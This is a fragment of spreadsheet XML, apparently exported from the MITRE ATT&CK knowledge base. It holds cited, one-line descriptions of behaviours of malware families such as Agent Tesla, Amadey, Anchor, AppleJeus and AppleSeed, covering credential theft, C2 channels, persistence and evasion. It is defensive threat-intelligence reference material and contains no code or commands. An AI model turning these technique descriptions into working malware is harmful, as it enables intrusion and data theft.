    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can steal data from the victim’s clipboard.(Citation: Talos Agent Tesla Oct 2018)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>relationship--06dded4b-f28c-45d3-8dc6-097a9a4a3cd6</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to extract credentials from configuration or support files.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>relationship--19821013-5844-46b3-82e9-189b4df07b9d</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to steal credentials from FTP clients and wireless profiles.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>relationship--ae151f0a-374b-47c0-a4e6-b9bdc7ee55b5</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can gather credentials from a number of browsers.(Citation: Bitdefender Agent Tesla April 2020) </t>
  </si>
  <si>
    <t>relationship--47173be4-dc15-49c6-9e81-cba36c6e6c68</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to extract credentials from the Registry.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>relationship--f2ac3f65-68d3-45d2-8aab-b2bd57036fa8</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>relationship--a4105315-b63d-47c9-9526-3dd388d892b4</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the capability to kill any running analysis processes and AV software.(Citation: Fortinet Agent Tesla June 2017)</t>
  </si>
  <si>
    <t>relationship--bbbf5a68-55bf-46f8-a810-fe1e4f580167</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has routines for exfiltration over SMTP, FTP, and HTTP.(Citation: Talos Agent Tesla Oct 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: SentinelLabs Agent Tesla Aug 2020)</t>
  </si>
  <si>
    <t>relationship--60c1b489-f1fc-4568-aba0-54e932715abc</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>relationship--216e5287-2cea-4bd0-b109-24b205f848b3</t>
  </si>
  <si>
    <t>12 December 2020</t>
  </si>
  <si>
    <t>16 December 2020</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has created hidden folders.(Citation: SentinelLabs Agent Tesla Aug 2020)</t>
  </si>
  <si>
    <t>relationship--98132f22-5312-421a-98f4-e1741abbcd6a</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has used &lt;code&gt;ProcessWindowStyle.Hidden&lt;/code&gt; to hide windows.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>relationship--75bd34c6-c8b3-4b5e-aac4-9e410515169c</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can download additional files for execution on the victim’s machine.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)</t>
  </si>
  <si>
    <t>relationship--40ae8100-d02c-445a-acf5-8e30f04ec6c0</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</si>
  <si>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</si>
  <si>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relationship--891217a4-3822-4345-b77f-448f41fd9361</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect account information from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)</t>
  </si>
  <si>
    <t>relationship--0d93e75b-e13d-4bd5-97d2-b4f8d05e9efd</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has used SMTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>relationship--c5401268-6b27-4088-9f2e-5439f68685d9</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has been executed through malicious e-mail attachments (Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>relationship--1cd41777-3d65-4e39-8de7-3951d1568c16</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can achieve persistence by modifying Registry key entries.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>relationship--d9cd513e-c863-4695-a6e0-b2e4e79c24e8</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</si>
  <si>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</si>
  <si>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relationship--4d7e8d98-9894-4dfa-9013-af8d83e6faea</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can list the current running processes on the system.(Citation: Fortinet Agent Tesla June 2017)</t>
  </si>
  <si>
    <t>relationship--431012d2-0ac4-49ba-b217-c118f0c1cf03</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has used process hollowing to create and manipulate processes through sections of unmapped memory by reallocating that space with its malicious code.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>relationship--ddee8f55-feed-4474-b996-b80bbe5209a4</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can inject into known, vulnerable binaries on targeted hosts.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>relationship--0432482e-344c-4be3-9a70-5391cf41a935</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can add itself to the Registry as a startup program to establish persistence.(Citation: Fortinet Agent Tesla April 2018)(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>relationship--0ecaa94b-3ad8-4de5-9cf2-81069676cfa3</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has dropped RegAsm.exe onto systems for performing malicious activity.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>relationship--30b4b9c6-1117-4242-80c4-fd7dc7016a08</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331)  has achieved persistence via scheduled tasks.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>relationship--946eecdd-fa23-4b5d-a992-452f50e8def8</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</si>
  <si>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</si>
  <si>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relationship--08109d9e-3258-4b9b-8e1d-ea90d05c18b9</t>
  </si>
  <si>
    <t xml:space="preserve">The primary delivered mechanism for [Agent Tesla](https://attack.mitre.org/software/S0331) is through email phishing messages.(Citation: Bitdefender Agent Tesla April 2020) </t>
  </si>
  <si>
    <t>relationship--06f7f9cd-4e6b-4abe-bff0-c9c0fcaf920e</t>
  </si>
  <si>
    <t>31 January 2023</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</si>
  <si>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</si>
  <si>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relationship--b509e591-b086-4631-a9ba-5a5dc80de8d0</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the IP address of the victim machine and spawn instances of netsh.exe to enumerate wireless settings.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>relationship--2fc8879c-1763-4ed0-b1d8-67b4c3d49ed9</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the username from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>relationship--3e370a6e-2a3c-4e56-aa57-fecab8d09709</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the timestamp from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)</t>
  </si>
  <si>
    <t>relationship--38248217-7c11-4ae9-a13e-7296dead0df8</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can access the victim’s webcam and record video.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Talos Agent Tesla Oct 2018)</t>
  </si>
  <si>
    <t>relationship--49efe6c7-aec6-4e54-bc7d-212816e23347</t>
  </si>
  <si>
    <t xml:space="preserve"> [Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to perform anti-sandboxing and anti-virtualization checks.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>relationship--061f0d25-40fd-440a-b7e8-54ad0209f5f4</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has used HTTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)</t>
  </si>
  <si>
    <t>relationship--5e8fc958-6778-4c46-ae15-0d239309bc76</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect names and passwords of all Wi-Fi networks to which a device has previously connected.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>relationship--fd348c91-a296-4bd0-b31c-894141a2827c</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has used wmi queries to gather information from the system.(Citation: Bitdefender Agent Tesla April 2020) </t>
  </si>
  <si>
    <t>relationship--1bce55fa-b34e-4522-9422-85bf3fdda889</t>
  </si>
  <si>
    <t>S0092</t>
  </si>
  <si>
    <t>Agent.btz</t>
  </si>
  <si>
    <t>malware--40d3e230-ed32-469f-ba89-be70cc08ab39</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) saves system information into an XML file that is then XOR-encoded.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>relationship--f4c6cb3f-b24c-4a1e-9bba-7b129b89a17a</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.(Citation: Securelist Agent.btz)</t>
  </si>
  <si>
    <t>relationship--8b96fb11-8b54-4bed-9e6c-cd93b29c5c20</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) attempts to download an encrypted binary from a specified domain.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>relationship--fcc12c1f-1a46-49f4-a872-99cb97968bf0</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</si>
  <si>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</si>
  <si>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relationship--7f3c015e-d95d-4d35-a583-236134464554</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) collects the network adapter’s IP and MAC address as well as IP addresses of the network adapter’s default gateway, primary/secondary WINS, DHCP, and DNS servers, and saves them into a log file.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>relationship--dc187ed1-3987-4575-b1af-dc150e4329f8</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) obtains the victim username and saves it to a file.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>relationship--6c71a59f-05e6-44cc-ace5-33200e1f0846</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) can collect information from a compromised host.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--3685caad-4ab6-42e8-888d-e7619006dd04</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has decoded antivirus name strings.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--d850589b-a36f-446e-9864-ae4d4a62b724</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has sent victim data to its C2 servers.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--52fb33e7-e53c-4d1f-b052-d3e373a64672</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has used fast flux DNS for its C2.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--1d91840d-b419-4d9f-9bba-8a9f18728854</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has searched for folders associated with antivirus software.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--062059e8-21cb-4030-8244-ce7f6643e3c9</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) can download and execute files to further infect a host machine with additional malware.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--a2b97730-39f9-4ba6-b481-d27f883ff26f</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has modified the `:Zone.Identifier` in the ADS area to zero.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--7a402933-faba-4de0-a7a5-3b44761cc062</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has overwritten registry keys for persistence.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--c2c31b26-7e42-43b6-964b-c959cabc53a4</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has used a variety of Windows API calls, including `GetComputerNameA`, `GetUserNameA`, and `CreateProcessA`.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--26818c78-7042-4493-a94b-eec0d7b9972a</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has obfuscated strings such as antivirus vendor names, domains, files, and others.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--1793516c-a4dd-4726-9bb3-c3b2bbecc605</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has changed the Startup folder to the one containing its executable by overwriting the registry keys.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--cf58d726-7674-4cdc-9ce1-9d7364aa4a0d</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has checked for a variety of antivirus products.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--240b044f-89b4-4009-bbf6-04b1f0bb6385</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has collected the computer name and OS version from a compromised machine.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--a6904fd0-d121-4b26-b05c-1615e3baf599</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) does not run any tasks or install additional malware if the victim machine is based in Russia.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--e2c08481-c9ad-4929-b470-afd2df7233ed</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) can identify the IP address of a victim machine.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--ff0d8483-0568-48c5-b380-22ed06ac01ed</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has collected the user name from a compromised host using `GetUserNameA`.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--d9a670e7-9076-4a4f-8861-981bb04b946f</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has used HTTP for C2 communications.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--e601ccd0-3b36-4ef9-b2de-9784539ecb75</t>
  </si>
  <si>
    <t>S0504</t>
  </si>
  <si>
    <t>Anchor</t>
  </si>
  <si>
    <t>malware--5f1d4579-4e8f-48e7-860e-2da773ae432e</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has been signed with valid certificates to evade detection by security tools.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--7840f5de-3b13-486c-bde2-7ffc73998010</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can install itself as a cron job.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>relationship--36df9345-1175-4425-af6f-e40e393fc182</t>
  </si>
  <si>
    <t>Variants of [Anchor](https://attack.mitre.org/software/S0504) can use DNS tunneling to communicate with C2.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>relationship--8bb2744c-3ea2-418b-818d-aaabe0c7746f</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can terminate itself if specific execution flags are not present.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--1a1e8bdb-bcb5-41ec-a151-c2f5ebc90ab2</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--f9fc4a7b-e8ba-4e50-b97f-9afabcfc73a8</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can self delete its dropper after the malware is successfully deployed.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--d456bea1-f43c-4934-91fe-54459842f1b2</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can download additional payloads.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>relationship--116996cd-b855-4730-814d-869fd90e7ce1</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used NTFS to hide files.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--f3f777de-db0e-4bde-b347-9c5727ef6bb7</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used ICMP in C2 communications.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--077ab82e-3847-4dab-80e2-5dc0ea7d8e9e</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has obfuscated code with stack strings and string encryption.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--9297d0b8-3a96-4fb9-90f2-8e3aa9fe4aca</t>
  </si>
  <si>
    <t>15 December 2021</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can support windows execution via SMB shares.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>relationship--f7ebcffb-0397-430b-a19f-0f2f842d79ed</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can create a scheduled task for persistence.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--250638f3-ac26-4aec-adf4-9e705822b621</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can create and execute services to load its payload.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>relationship--f71de781-3899-46ad-9c57-a63f683afab2</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has come with a packed payload.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--f278e83c-f93e-403d-a088-30c4d9d3f984</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can determine the hostname and linux version on a compromised host.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>relationship--23c89ec7-3407-4f6d-8b4b-0ab16fbf356c</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can determine the public IP and location of a compromised host.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>relationship--a73d5874-4aa6-4126-8ae6-af7416b7dc43</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can execute payloads via shell scripting.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>relationship--51adc4b0-bf1b-4c55-ac6c-72b46560e833</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used HTTP and HTTPS in C2 communications.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--736b73d4-a72b-46cc-a9f0-b102d0d0ec48</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used cmd.exe to run its self deletion routine.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--112012c7-a727-47a4-8a7a-ccb7d40a3311</t>
  </si>
  <si>
    <t xml:space="preserve">[Anchor](https://attack.mitre.org/software/S0504) can establish persistence by creating a service.(Citation: Cyberreason Anchor December 2019)	</t>
  </si>
  <si>
    <t>relationship--90f5f474-eed1-4145-be80-155bc5783680</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has presented the user with a UAC prompt to elevate privileges while installing.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--c8de0953-1f20-47a4-bb02-ea9c30e8f932</t>
  </si>
  <si>
    <t xml:space="preserve">[AppleJeus](https://attack.mitre.org/software/S0584) has used a valid digital signature from Sectigo to appear legitimate.(Citation: CISA AppleJeus Feb 2021) </t>
  </si>
  <si>
    <t>relationship--562d2865-7133-4cdb-b280-c90105b0a118</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has decoded files received from a C2.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--026d4fb6-4683-4e64-a69c-82e39dd11b23</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has exfiltrated collected host information to a C2 server.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--1d17e8d5-7a65-4d67-bfec-0ef7cad974d9</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has deleted the MSI file after installation.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--0a068253-0c11-4ba7-bac4-1290e5f50960</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has added a leading &lt;code&gt;.&lt;/code&gt; to plist filenames, unlisting them from the Finder app and default Terminal directory listings.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--37960736-9995-4ba6-bc65-a1d0cf6ec000</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</si>
  <si>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</si>
  <si>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relationship--0e078567-e5b6-45b6-a1c7-3b1f8ac3e2a8</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has placed a plist file within the &lt;code&gt;LaunchDaemons&lt;/code&gt; folder and launched it manually.(Citation: CISA AppleJeus Feb 2021)(Citation: ObjectiveSee AppleJeus 2019)</t>
  </si>
  <si>
    <t>relationship--f9aa88f9-353c-4cc0-8d58-b5b4b00bfff2</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has loaded a plist file using the &lt;code&gt;launchctl&lt;/code&gt; command.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--3eb174df-6b12-484e-89c1-fce208e6cdfd</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has required user execution of a malicious MSI installer.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--dd48cdb6-ab24-410b-ac3e-624b1ed8cf92</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584)'s spearphishing links required user interaction to navigate to the malicious website.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--fbe555c3-5c7b-44e7-a48f-293bdae9de0c</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has been installed via MSI installer.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--8d3f505a-35d6-4c79-afc3-88979d9e156c</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has XOR-encrypted collected system information prior to sending to a C2. [AppleJeus](https://attack.mitre.org/software/S0584) has also used the open source ADVObfuscation library for its components.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--de300ca1-3935-4b44-9b35-e32eee5304f7</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has created a scheduled SYSTEM task that runs when a user logs in.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--ac85daf7-c5ee-4f53-8ed8-0049ac7cc6e9</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has been distributed via spearphishing link.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--30a465fc-955e-4688-9349-daf17a287c47</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has collected the victim host information after infection.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--70c29cd1-53a2-48a6-8f94-515e7812013b</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has waited a specified time before downloading a second stage payload.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--e5cb79c2-2bc0-47e2-be01-6bcf55d4c1a2</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has used shell scripts to execute commands after installation and set persistence mechanisms.(Citation: CISA AppleJeus Feb 2021)(Citation: ObjectiveSee AppleJeus 2019)</t>
  </si>
  <si>
    <t>relationship--60da816d-f78b-4566-9587-b572ad579e15</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has sent data to its C2 server via &lt;code&gt;POST&lt;/code&gt; requests.(Citation: CISA AppleJeus Feb 2021)(Citation: ObjectiveSee AppleJeus 2019)</t>
  </si>
  <si>
    <t>relationship--438d3e9d-2a1d-48ba-b615-8ccb502dd15e</t>
  </si>
  <si>
    <t xml:space="preserve">[AppleJeus](https://attack.mitre.org/software/S0584) can install itself as a service.(Citation: CISA AppleJeus Feb 2021) </t>
  </si>
  <si>
    <t>relationship--3503cf12-e618-44b9-ac48-e1f1d7939767</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can gain system level privilege by passing &lt;code&gt;SeDebugPrivilege&lt;/code&gt; to the &lt;code&gt;AdjustTokenPrivilege&lt;/code&gt; API.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--57aa85a9-8484-4a1a-947f-3d266d2b3c7d</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has compressed collected data before exfiltration.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--985066fb-7fbb-4147-a69d-b33d45cd3e7f</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can zip and encrypt data collected on a target system.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--dfd24960-6b7e-4fab-bb84-2fc2ed4fc772</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has automatically collected data from USB drives, keystrokes, and screen images before exfiltration.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--7f1c1e43-07dc-4deb-a27f-9f140a894c51</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has divided files if the size is 0x1000000 bytes or more.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--909b065a-d857-48dc-9d6b-f7847bf613e6</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can collect data on a compromised host.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--64a40a9a-ddea-430d-ab08-77c350d83497</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can find and collect data from removable media devices.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--e465cb38-ba50-4d2d-b2cd-659742815317</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can decode its payload prior to execution.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--3a6a72e8-0637-41db-b455-6b5d629aba28</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can exfiltrate files via the C2 channel.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--9ee16333-0c70-4d8a-8fc7-ab81e4fe389a</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has exfiltrated files using web services.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--82a28d75-1f8e-45fa-9988-af46ed102cab</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can use a second channel for C2 when the primary channel is in upload mode.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--98fc2f95-0c93-405a-a54e-880622d8d233</t>
  </si>
